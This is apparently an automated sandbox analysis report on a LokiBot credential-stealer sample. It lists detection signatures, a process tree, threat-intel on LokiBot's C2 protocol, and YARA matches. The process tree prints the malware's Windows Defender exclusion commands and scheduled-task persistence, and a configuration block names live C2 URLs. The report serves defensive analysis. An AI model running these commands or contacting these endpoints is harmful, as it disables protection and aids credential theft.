Edit tour

Windows Analysis Report
oAUBqI6vQ7.exe

Overview

General Information

Sample name:	oAUBqI6vQ7.exe renamed because original name is a hash value
Original sample name:	72d3358ea74f770930e44d382a00387f1451399ef01a513d11ef80ba2f9da653.exe
Analysis ID:	1588296
MD5:	04e3fef83680d0b3fcf172f1b095bfde
SHA1:	a0c6645e1990fbff34a5d85133d43d52b094125b
SHA256:	72d3358ea74f770930e44d382a00387f1451399ef01a513d11ef80ba2f9da653
Tags:	exeLokiuser-adrian__luca
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

oAUBqI6vQ7.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\oAUBqI6vQ7.exe" MD5: 04E3FEF83680D0B3FCF172F1B095BFDE)

powershell.exe (PID: 7824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Xzacmv.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7308 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7960 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

oAUBqI6vQ7.exe (PID: 8120 cmdline: "C:\Users\user\Desktop\oAUBqI6vQ7.exe" MD5: 04E3FEF83680D0B3FCF172F1B095BFDE)

MpCmdRun.exe (PID: 7960 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)

conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Xzacmv.exe (PID: 8160 cmdline: C:\Users\user\AppData\Roaming\Xzacmv.exe MD5: 04E3FEF83680D0B3FCF172F1B095BFDE)

schtasks.exe (PID: 2816 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmpB3BF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Xzacmv.exe (PID: 2168 cmdline: "C:\Users\user\AppData\Roaming\Xzacmv.exe" MD5: 04E3FEF83680D0B3FCF172F1B095BFDE)

Xzacmv.exe (PID: 4900 cmdline: "C:\Users\user\AppData\Roaming\Xzacmv.exe" MD5: 04E3FEF83680D0B3FCF172F1B095BFDE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1e884:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xbc37:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1a47b:$des3: 68 03 66 00 00 0x1e884:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1e950:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17c40:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x500b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1384f:$des3: 68 03 66 00 00 0x17c40:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17d0c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x175c0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x498b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x131cf:$des3: 68 03 66 00 00 0x175c0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1768c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x175e0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x49ab:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x131ef:$des3: 68 03 66 00 00 0x175e0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x176ac:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.2349385278.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x7aef4:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x682a7:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x76aeb:$des3: 68 03 66 00 00 0x7aef4:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x7afc0:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17c60:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x502b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1386f:$des3: 68 03 66 00 00 0x17c60:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17d2c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: oAUBqI6vQ7.exe PID: 7616	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: oAUBqI6vQ7.exe PID: 7616	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: oAUBqI6vQ7.exe PID: 7616	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: oAUBqI6vQ7.exe PID: 7616	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x652c2:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x6edfb:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x7f5ff:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: oAUBqI6vQ7.exe PID: 8120	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: Xzacmv.exe PID: 8160	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Xzacmv.exe PID: 8160	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Xzacmv.exe PID: 8160	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Xzacmv.exe PID: 8160	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x10350:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x20f29:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x5e122:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Xzacmv.exe PID: 4900	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Xzacmv.exe PID: 4900	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Xzacmv.exe PID: 4900	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x4fe5:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 52 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
10.2.Xzacmv.exe.3aab850.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.Xzacmv.exe.3aab850.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
10.2.Xzacmv.exe.3aab850.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
10.2.Xzacmv.exe.3aab850.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
10.2.Xzacmv.exe.3aab850.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
10.2.Xzacmv.exe.3aab850.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
10.2.Xzacmv.exe.3aab850.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.Xzacmv.exe.3aab850.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Xzacmv.exe.3aab850.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
10.2.Xzacmv.exe.3aab850.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
10.2.Xzacmv.exe.3aab850.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
10.2.Xzacmv.exe.3aab850.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
10.2.Xzacmv.exe.3aab850.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
10.2.Xzacmv.exe.3ac5870.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.Xzacmv.exe.3ac5870.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
10.2.Xzacmv.exe.3ac5870.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
10.2.Xzacmv.exe.3ac5870.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
10.2.Xzacmv.exe.3ac5870.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
15.2.Xzacmv.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
15.2.Xzacmv.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
